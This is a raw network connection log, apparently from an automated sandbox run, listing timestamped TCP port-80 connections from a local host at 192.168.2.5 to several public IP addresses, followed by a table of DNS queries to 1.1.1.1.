                                                                                Dec 5, 2024 14:26:56.596960068 CET4999580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:56.716931105 CET8049995183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:58.148675919 CET8049995183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:58.157227039 CET4999580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:58.166039944 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:58.170789957 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:58.285934925 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:58.285999060 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:58.286137104 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:58.290565014 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:58.290620089 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:58.290731907 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:58.405869007 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:58.410825968 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:59.513760090 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:59.513820887 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:59.513848066 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:59.513890982 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:59.551424980 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:59.573761940 CET5000780192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:59.672219038 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:59.696518898 CET805000749.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:59.696608067 CET5000780192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:59.698271036 CET5000780192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:59.818038940 CET805000749.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:59.906419039 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:59.906547070 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:59.906550884 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:59.906622887 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:59.906691074 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:00.026791096 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:00.150713921 CET8049942114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:00.150774002 CET4994280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.150872946 CET4994280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.151640892 CET5000980192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.271008015 CET8049942114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:00.271378040 CET8050009114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:00.271441936 CET5000980192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.271812916 CET5000980192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.392301083 CET8050009114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:01.395277977 CET4998780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.395384073 CET5000980192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.397080898 CET5001480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.517016888 CET8050014114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:01.517548084 CET5001480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.517812014 CET5001480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.637517929 CET8050014114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:04.225837946 CET805000749.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:27:04.231163025 CET5000780192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:27:04.231911898 CET5002080192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:04.351744890 CET8050020123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:27:04.351813078 CET5002080192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:04.351999998 CET5002080192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:04.471801996 CET8050020123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:27:05.633759022 CET5001480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:05.929930925 CET8050020123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:27:05.934792995 CET5002080192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:05.942413092 CET5002680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:05.942564011 CET5002780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:05.943209887 CET5002880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:06.062263012 CET8050026182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:06.062280893 CET8050027119.29.29.29192.168.2.5
Dec 5, 2024 14:27:06.062371969 CET  50026        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:06.062375069 CET  50027        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:06.062565088 CET  50026        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:06.062864065 CET  50027        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:06.062930107 CET  80           50028      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:06.062983990 CET  50028        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:06.063364983 CET  50028        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:06.182348013 CET  80           50026      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:06.182579994 CET  80           50027      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:06.183011055 CET  80           50028      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:07.295473099 CET  80           50027      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:07.295523882 CET  80           50027      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:07.295551062 CET  50027        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:07.295576096 CET  50027        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:07.295639992 CET  50027        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:07.303301096 CET  50030        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:07.416174889 CET  80           50027      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:07.423041105 CET  80           50030      183.60.95.221    192.168.2.5
Dec 5, 2024 14:27:07.423125029 CET  50030        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:07.423237085 CET  50030        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:07.543015957 CET  80           50030      183.60.95.221    192.168.2.5
Dec 5, 2024 14:27:07.649446011 CET  80           50026      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:07.649548054 CET  80           50026      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:07.649580002 CET  50026        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:07.650064945 CET  50026        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:07.657319069 CET  50026        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:07.777177095 CET  80           50026      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:08.964220047 CET  80           50030      183.60.95.221    192.168.2.5
Dec 5, 2024 14:27:08.973190069 CET  50030        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:08.975769043 CET  50035        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:09.095540047 CET  80           50035      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:09.095890999 CET  50035        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:09.095890999 CET  50035        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:09.215818882 CET  80           50035      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:09.941646099 CET  50028        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:10.935267925 CET  80           50035      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:10.988814116 CET  50035        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:11.025849104 CET  50035        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:11.031769991 CET  50040        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:11.151643991 CET  80           50040      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:11.151869059 CET  50040        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:11.155288935 CET  50040        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:11.275130033 CET  80           50040      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:12.934119940 CET  80           50040      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:12.938015938 CET  50040        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:12.942584991 CET  50046        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:12.942694902 CET  50047        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:12.947765112 CET  50048        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:13.062747002 CET  80           50046      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:13.062783957 CET  80           50047      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:13.063899994 CET  50047        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:13.063901901 CET  50046        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:13.064100981 CET  50047        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:13.064102888 CET  50046        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:13.067622900 CET  80           50048      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:13.067747116 CET  50048        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:13.071764946 CET  50048        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:13.183907986 CET  80           50047      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:13.183936119 CET  80           50046      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:13.191517115 CET  80           50048      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:14.318424940 CET  80           50047      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:14.318445921 CET  80           50047      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:14.318475962 CET  50047        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:14.318506002 CET  50047        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:14.318567038 CET  50047        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:14.323699951 CET  50052        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:14.438442945 CET  80           50047      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:14.443496943 CET  80           50052      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:14.443552971 CET  50052        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:14.443644047 CET  50052        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:14.563474894 CET  80           50052      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:14.664510012 CET  80           50046      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:14.664618015 CET  80           50046      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:14.664650917 CET  50046        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:14.664679050 CET  50046        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:14.664735079 CET  50046        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:14.784707069 CET  80           50046      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:16.259028912 CET  80           50052      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:16.265422106 CET  50052        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:16.265847921 CET  50056        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:16.386089087 CET  80           50056      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:16.386162996 CET  50056        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:16.386384010 CET  50056        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:16.506079912 CET  80           50056      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:16.961981058 CET  50048        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:18.197642088 CET  80           50056      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:18.201893091 CET  50056        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:18.202750921 CET  50061        80         192.168.2.5      123.126.45.208
Dec 5, 2024 14:27:18.322719097 CET  80           50061      123.126.45.208   192.168.2.5
Dec 5, 2024 14:27:18.322810888 CET  50061        80         192.168.2.5      123.126.45.208
Dec 5, 2024 14:27:18.322895050 CET  50061        80         192.168.2.5      123.126.45.208
Dec 5, 2024 14:27:18.443213940 CET  80           50061      123.126.45.208   192.168.2.5
Dec 5, 2024 14:27:19.897171021 CET  80           50061      123.126.45.208   192.168.2.5
Dec 5, 2024 14:27:19.901731968 CET  50061        80         192.168.2.5      123.126.45.208
Dec 5, 2024 14:27:19.905616999 CET  50067        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:19.907195091 CET  50068        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:19.909914017 CET  50069        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:20.025585890 CET  80           50067      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:20.025666952 CET  50067        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:20.026598930 CET  50067        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:20.026922941 CET  80           50068      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:20.026988983 CET  50068        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:20.027196884 CET  50068        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:20.029618979 CET  80           50069      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:20.029678106 CET  50069        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:20.029937983 CET  50069        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:20.146312952 CET  80           50067      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:20.146840096 CET  80           50068      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:20.149736881 CET  80           50069      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:21.254275084 CET  80           50069      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:21.254355907 CET  80           50069      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:21.254479885 CET  50069        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:21.258497000 CET  50069        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:21.289211035 CET  50073        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:21.379458904 CET  80           50069      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:21.410165071 CET  80           50073      183.60.95.221    192.168.2.5
Dec 5, 2024 14:27:21.415887117 CET  50073        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:21.416002035 CET  50073        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:21.536060095 CET  80           50073      183.60.95.221    192.168.2.5
Dec 5, 2024 14:27:21.593816042 CET  80           50068      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:21.593836069 CET  80           50068      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:21.595844030 CET  50068        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:21.596560001 CET  50068        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:21.719902992 CET  80           50068      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:22.952295065 CET  80           50073      183.60.95.221    192.168.2.5
Dec 5, 2024 14:27:22.956842899 CET  50073        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:22.957478046 CET  50078        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:23.077719927 CET  80           50078      183.60.95.221    192.168.2.5
Dec 5, 2024 14:27:23.078037977 CET  50078        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:23.078197002 CET  50078        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:23.197896004 CET  80           50078      183.60.95.221    192.168.2.5
Dec 5, 2024 14:27:23.910418034 CET  50067        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:24.623226881 CET  80           50078      183.60.95.221    192.168.2.5
Dec 5, 2024 14:27:24.683907986 CET  50078        80         192.168.2.5      183.60.95.221
Dec 5, 2024 14:27:24.895530939 CET  50082        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:24.901503086 CET  50083        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:24.981312990 CET  50084        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:25.015338898 CET  80           50082      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:25.015456915 CET  50082        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:25.015767097 CET  50082        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:25.021425962 CET  80           50083      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:25.021517992 CET  50083        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:25.021914005 CET  50083        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:25.101327896 CET  80           50084      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:25.101438999 CET  50084        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:25.101630926 CET  50084        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:25.137768984 CET  80           50082      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:25.145382881 CET  80           50083      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:25.223694086 CET  80           50084      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:26.245949030 CET  80           50083      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:26.246001005 CET  80           50083      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:26.246010065 CET  50083        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:26.246073008 CET  50083        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:26.246088028 CET  50083        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:26.249917030 CET  50085        80         192.168.2.5      49.7.37.97
Dec 5, 2024 14:27:26.365756989 CET  80           50083      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:26.369659901 CET  80           50085      49.7.37.97       192.168.2.5
Dec 5, 2024 14:27:26.369762897 CET  50085        80         192.168.2.5      49.7.37.97
Dec 5, 2024 14:27:26.369856119 CET  50085        80         192.168.2.5      49.7.37.97
Dec 5, 2024 14:27:26.489710093 CET  80           50085      49.7.37.97       192.168.2.5
Dec 5, 2024 14:27:26.661813974 CET  80           50084      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:26.661896944 CET  50084        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:26.661953926 CET  80           50084      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:26.661967993 CET  50084        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:26.662003994 CET  50084        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:26.781691074 CET  80           50084      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:27.945915937 CET  80           50085      49.7.37.97       192.168.2.5
Dec 5, 2024 14:27:27.950721979 CET  50085        80         192.168.2.5      49.7.37.97
Dec 5, 2024 14:27:29.109939098 CET  50086        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:29.229757071 CET  80           50086      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:29.231728077 CET  50086        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:29.231812000 CET  50086        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:29.351711035 CET  80           50086      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:31.102735996 CET  80           50086      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:31.107212067 CET  50087        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:31.107217073 CET  50086        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:31.227243900 CET  80           50087      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:31.227488041 CET  50087        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:31.227541924 CET  50087        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:31.347271919 CET  80           50087      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:32.978173018 CET  80           50087      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:32.984870911 CET  50087        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:33.001848936 CET  50088        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:33.006149054 CET  50089        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:33.006164074 CET  50090        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:33.121627092 CET  80           50088      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:33.122025967 CET  50088        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:33.126008034 CET  50088        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:33.126045942 CET  80           50089      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:33.126060009 CET  80           50090      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:33.129956007 CET  50089        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:33.129971981 CET  50090        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:33.130351067 CET  50089        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:33.133829117 CET  50090        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:33.245721102 CET  80           50088      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:33.251524925 CET  80           50089      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:33.253549099 CET  80           50090      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:34.363368988 CET  80           50090      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:34.363435030 CET  50090        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:34.363574028 CET  80           50090      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:34.363641977 CET  50090        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:34.364422083 CET  50090        80         192.168.2.5      119.29.29.29
Dec 5, 2024 14:27:34.369611979 CET  50091        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:34.484141111 CET  80           50090      119.29.29.29     192.168.2.5
Dec 5, 2024 14:27:34.489411116 CET  80           50091      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:34.489486933 CET  50091        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:34.489578009 CET  50091        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:34.609447956 CET  80           50091      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:35.257442951 CET  80           50089      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:35.257612944 CET  80           50089      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:35.259923935 CET  50089        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:35.259923935 CET  50089        80         192.168.2.5      182.254.116.116
Dec 5, 2024 14:27:35.379744053 CET  80           50089      182.254.116.116  192.168.2.5
Dec 5, 2024 14:27:46.901498079 CET  80           50082      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:46.901575089 CET  50082        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:47.043818951 CET  50082        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:47.163933992 CET  80           50082      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:55.026515961 CET  80           50088      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:55.026580095 CET  50088        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:55.026735067 CET  50088        80         192.168.2.5      114.114.114.114
Dec 5, 2024 14:27:55.146410942 CET  80           50088      114.114.114.114  192.168.2.5
Dec 5, 2024 14:27:56.385965109 CET  80           50091      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:56.386025906 CET  50091        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:56.386092901 CET  50091        80         192.168.2.5      27.221.16.149
Dec 5, 2024 14:27:56.386531115 CET  50092        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:56.505877972 CET  80           50091      27.221.16.149    192.168.2.5
Dec 5, 2024 14:27:56.506267071 CET  80           50092      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:56.506345987 CET  50092        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:56.506449938 CET  50092        80         192.168.2.5      27.221.16.179
Dec 5, 2024 14:27:56.626339912 CET  80           50092      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:58.260540009 CET  80           50092      27.221.16.179    192.168.2.5
Dec 5, 2024 14:27:58.265866995 CET  50092        80         192.168.2.5      27.221.16.179
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 14:25:08.844228029 CET | 51241 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:09.713490963 CET | 53 | 51241 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:11.000616074 CET | 53569 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:11.000616074 CET | 50538 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:11.002671957 CET | 62560 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:11.003994942 CET | 52476 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:11.005053043 CET | 62130 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:11.155478001 CET | 53 | 52476 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:11.675436020 CET | 53 | 50538 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:11.881963968 CET | 53 | 62560 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:11.972735882 CET | 53 | 53569 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:12.737009048 CET | 57865 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:12.759824038 CET | 59839 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:13.648283005 CET | 53 | 59839 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:13.723079920 CET | 57865 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:14.310357094 CET | 53 | 57865 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:14.310375929 CET | 53 | 57865 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:26.504998922 CET | 61265 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:27.504304886 CET | 61265 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:28.519720078 CET | 61265 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:28.557156086 CET | 53 | 61265 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:28.557267904 CET | 53 | 61265 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:28.661678076 CET | 53 | 61265 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:41.681833029 CET | 56510 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:42.676470995 CET | 56510 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:25:43.004333019 CET | 53 | 56510 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:25:43.004358053 CET | 53 | 56510 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:26:19.135962963 CET | 62496 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:26:19.276137114 CET | 53 | 62496 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:26:26.975692987 CET | 59472 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:26:27.114407063 CET | 53 | 59472 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:26:50.392587900 CET | 50653 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:26:50.800753117 CET | 53 | 50653 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:26:56.062326908 CET | 51190 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:26:56.464216948 CET | 53 | 51190 | 1.1.1.1 | 192.168.2.5
Dec 5, 2024 14:27:27.951493979 CET | 55437 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:27:28.957143068 CET | 55437 | 53 | 192.168.2.5 | 1.1.1.1
Dec 5, 2024 14:27:29.105617046 CET | 53 | 55437 | 1.1.1.1 | 192.168.2.5
